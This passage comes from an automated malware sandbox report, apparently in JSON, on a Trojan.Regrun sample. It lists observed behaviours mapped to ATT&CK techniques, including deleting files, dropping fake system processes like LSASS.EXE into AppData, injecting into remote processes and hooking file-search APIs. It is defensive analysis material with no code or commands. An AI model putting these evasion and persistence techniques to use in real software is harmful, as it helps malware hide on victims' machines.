\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\D3_08.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\D3_08.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\D3_08.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" marked \"C:\\share\\D3_08\\New Folder.exe\" for deletion\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" marked \"C:\\share\\Data %OSUSER%.exe\" for deletion\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "target-58", "type": 9, "relevance": 10, "name": "The analysis spawned a process that was identified as malicious", "description": "17/22 Antivirus vendors marked spawned process \"IExplorer.exe\" (PID: 800) as malicious (classified as \"Trojan.Regrun\" with 77% detection rate)\n 17/22 Antivirus vendors marked spawned process \"IExplorer.exe\" (PID: 2156) as malicious (classified as \"Trojan.Regrun\" with 77% detection rate)", "origin": "Monitored Target", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "17/22 Antivirus vendors marked dropped file \"services.exe\" as malicious (classified as \"Trojan.Regrun\" with 77% detection rate)\n 17/22 Antivirus vendors marked dropped file \"lsass.exe\" as malicious (classified as \"Trojan.Regrun\" with 77% detection rate)\n 17/22 Antivirus vendors marked dropped file \"IExplorer.exe\" as malicious (classified as \"Trojan.Regrun\" with 77% detection rate)\n 17/22 Antivirus vendors marked dropped file \"winlogon.exe\" as malicious (classified as \"Trojan.Regrun\" with 77% detection rate)\n 17/22 Antivirus vendors marked dropped file \"smss.exe\" as malicious (classified as \"Trojan.Regrun\" with 77% detection rate)\n 17/22 Antivirus vendors marked dropped file \"D3_08.exe\" as malicious (classified as \"Trojan.Regrun\" with 77% detection rate)\n 17/22 Antivirus vendors marked dropped file \"csrss.exe\" as malicious (classified as \"Trojan.Regrun\" with 77% detection rate)\n 17/22 Antivirus vendors marked dropped file \"LSASS.EXE\" as malicious (classified as \"Trojan.Regrun\" with 77% detection rate)\n 17/22 Antivirus vendors marked dropped file \"SMSS.EXE\" as malicious (classified as \"Trojan.Regrun\" with 77% detection rate)\n 17/22 Antivirus vendors marked dropped file \"SERVICES.EXE\" as malicious (classified as \"Trojan.Regrun\" with 77% detection rate)\n 17/22 Antivirus vendors marked dropped file \"WINLOGON.EXE\" as malicious (classified as \"Trojan.Regrun\" with 77% detection rate)\n 17/22 Antivirus vendors marked dropped file \"CSRSS.EXE\" as malicious (classified as \"Trojan.Regrun\" with 77% detection rate)", "origin": "Binary File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched \"K:\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched \"L:\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched \"M:\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched \"N:\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched \"O:\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched \"P:\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched \"Q:\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched \"R:\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched \"S:\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched \"T:\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched \"U:\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched \"V:\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" (UID: 00000000-00005912)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005904)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004200)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006100)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006036)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006068)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002312)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006120)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006024)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004424)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004416)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006040)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003524)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003572)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004420)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003476)\n Spawned process \"D3_08.exe\" (UID: 00000000-00001748)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002684)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002656)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004116)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001856)\n Spawned process \"D3_08.exe\" (UID: 00000000-00001176)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003904)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003548)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003816)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004112)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004508)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003652)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004172)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003880)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003676)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003856)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003048)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003636)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002356)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003232)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001084)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001988)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002244)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003700)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00000884)\n Spawned process \"D3_08.exe\" (UID: 00000000-00001524)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002032)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002484)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003220)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003276)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004580)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003868)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003576)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003828)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001188)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003532)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004608)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00001120)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 628)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 628)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 628)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 624)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 624)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 624)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 628)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 628)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 628)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 428)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 428)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 428)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" allocated memory in \"C:\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\"\n \"D3_08.exe\" allocated memory in \"%WINDIR%\\D3_08.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"\n \"SMSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SMSS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00006068)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002312)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00006024)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004424)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00006040)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003524)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004420)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003476)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002684)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002656)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003904)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003548)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003816)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004508)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003652)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004172)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003676)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003856)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003048)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003636)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002356)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003232)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00001084)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002244)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003700)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00000884)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002032)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002484)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003220)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003276)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004580)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003868)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003828)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00001188)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003532)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004608)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001120)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004616)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003180)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004572)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004816)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindNextFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in 